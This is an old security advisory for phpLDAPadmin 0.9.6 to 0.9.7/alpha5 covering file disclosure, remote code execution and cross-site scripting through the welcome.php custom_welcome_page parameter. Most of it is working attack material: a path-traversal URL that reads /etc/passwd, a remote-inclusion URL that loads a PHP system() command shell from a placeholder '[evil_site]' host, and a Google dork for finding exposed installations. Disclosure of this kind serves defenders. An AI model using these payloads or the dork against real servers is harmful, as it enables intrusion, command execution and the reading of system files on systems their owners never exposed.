phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure, remote code execution, cross site scripting software: author site: http://phpldapadmin.sourceforge.net/ description: phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server if unpatched and vulnerable, a user can see any file on target system, poc: http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd a user can also execute arbitrary php code and system commands: http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif where cmd.gif is a file like this: <?php system('[some_command]); ?> also a user can craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser googledork: phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php rgod site: http://rgod.altervista.org email: retrogod at aliceposta.it original advisory: http://www.rgod.altervista.org/phpldap.html
![http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif](http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif){kind=link}
